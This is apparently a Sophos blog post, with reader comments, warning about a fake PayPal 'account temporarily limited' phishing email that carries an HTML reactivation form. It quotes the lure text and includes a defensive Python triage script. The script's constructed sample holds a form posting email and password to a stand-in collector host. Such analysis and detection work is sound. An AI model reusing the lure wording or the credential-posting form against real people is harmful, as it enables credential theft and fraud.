Have you received an email, seemingly from PayPal, declaring that your account has been temporarily limited?
Plenty of people have been targeted by an attack which uses the subject line “Your account has been temporarily limited!” and claims to come from what appears to be an official PayPal address.
Well, beware of opening the attached reactivation form too quickly, because you could be handing your personal information to cybercriminals.
The emails are bogus and the headers are forged, all with the intention of stealing information from you.
Here is part of the text that we are seeing spammed out widely right now:
Dear PayPal account holder,
PayPal is constantly working to ensure security by regularly screening the accounts in our system. We have recently determined that different computers have tried logging into your PayPal account,and multiple password failures were present before the logons.
Sounds scary, eh? People on different computers have been trying to log into your PayPal account, guessing at the password? Nasty!
Until we can collect secure information, your access to sensitive account features will be limited. We would like to restore your access as soon as possible, and we apologize for the inconvenience.
Those nice folks at PayPal are looking out for you! They’ve locked down the account because of all the attempted intrusions. Thank goodness!
Download and fill out the form to resolve the problem and then log into your account.
And sure enough, there is a form attached to the email. It’s called Restore_your_account_PayPal.html.
But neither these emails nor the form really come from PayPal, and entering your confidential information into the form only passes your private data to the cybercriminals behind this spam campaign, who will use it to drain your account of money and perhaps steal your identity.
Sophos customers are proactively protected against this attack. You may not have fallen for it (the lack of graphics in the email body makes it look less convincing than some of the PayPal phishing scams we often see), but you may have loved ones and acquaintances who would be vulnerable to an attack like this.
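The two tells described above, forged sender headers and an HTML "form" attachment that posts credentials somewhere other than PayPal, can be checked mechanically. The following triage script is an added example, not Sophos code; it parses a constructed message that mimics this campaign (the Return-Path and form target are made-up .invalid domains) and reports each indicator it finds.

```python
import email
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample mimicking the campaign above (not a real capture); made-up .invalid domains.
SAMPLE_EML = """\
From: PayPal <service@paypal.com>
Return-Path: <bounce@example-mailer.invalid>
Subject: Your account has been temporarily limited!
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Download and fill out the form to resolve the problem and then log into your account.
--b1
Content-Type: text/html; name="Restore_your_account_PayPal.html"
Content-Disposition: attachment; filename="Restore_your_account_PayPal.html"

<html><body><form action="http://collector.invalid/post.php" method="post">
<input name="email"><input name="password" type="password"></form></body></html>
--b1--
"""

FORM_ACTION = re.compile(r'<form[^>]*\baction=["\']?([^"\'\s>]+)', re.IGNORECASE)

def domain_of(header_value):
    """Lower-cased domain of the first address in a header ('' if none)."""
    return parseaddr(str(header_value))[1].rpartition('@')[2].lower()

def triage(raw_message):
    """Return indicators found: From/Return-Path mismatch, HTML attachments, off-brand form targets."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    from_dom = domain_of(msg.get('From', ''))
    rp_dom = domain_of(msg.get('Return-Path', ''))
    if from_dom and rp_dom and from_dom != rp_dom:
        findings.append(f'Return-Path domain {rp_dom} does not match From domain {from_dom}')
    for part in msg.iter_attachments():
        name = part.get_filename() or ''
        if not name.lower().endswith(('.htm', '.html')):
            continue  # only the HTML "form" lure is of interest here
        findings.append(f'HTML attachment {name}')
        for action in FORM_ACTION.findall(part.get_content()):
            target = urlparse(action).hostname or ''
            if target != 'paypal.com' and not target.endswith('.paypal.com'):
                findings.append(f'form in {name} posts to {target}')
    return findings
```

Run `triage(open('suspect.eml').read())` on a saved message; an empty list means none of these three indicators were present, not that the message is safe.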
If I am ever in doubt about an email I go to the company’s website and sign into my account and talk to them directly.
I have clients who really need this type of protection — but your blog article isn't pointing to anywhere on your site where my clients can also be "proactively protected against this attack". I cannot tell you the number of folks I have helped who kind of knew they shouldn't have responded to this type of attack, but did anyway. I think that even where there is a lot of education about these types of attack, many do not feel empowered to ignore messages or are more afraid of missing something important. Thanks for the fine review of this type of scam.
Thanks for the feedback. Sophos's email protection solutions are described here: http://www.sophos.com/products/enterprise/email/
I do not know why people use Paypal. It is insecure, and is run by people with no scruples.
How can any company that presents itself as a bank block your account? Paypal is not a bank, and never will be one! Do not trust such a company, a wolf dressed as a lam.
Paypal is perfectly safe if used properly. Giving away insecure information under insecure circumstances will render anyone vulnerable. Scaremongering about 'wolves' and 'lam(s)' [sic] might well display your own paranoia but helps no-one.
Caution and common sense are required in the real world AND on the internet.
I received a grateful email from PayPal when I forwarded such a phish to spoof@paypal.com. I think it is important for companies to know when their name is being used for fraudulent purposes. I can tell most of these are fraudulent because I don't even have accounts with the companies that are supposedly warning me about my accounts.
You can report PayPal spam and phishing by forwarding it to PayPal: spoof@paypal.com. Most companies have an address where you can forward to them suspected phishing. I never open any attachments unless a friend calls and tells me it's on its way and never open fw. jokes or funnies even from friends. It's easy to be safe if you're cautious!
Genuine emails from PayPal always address the recipient by their name…
On a related note… I received several phone calls from what the Caller ID said was PayPal/E-Bay last week. I have no outstanding accounts with E-Bay and my PayPal balance is zero. Be aware!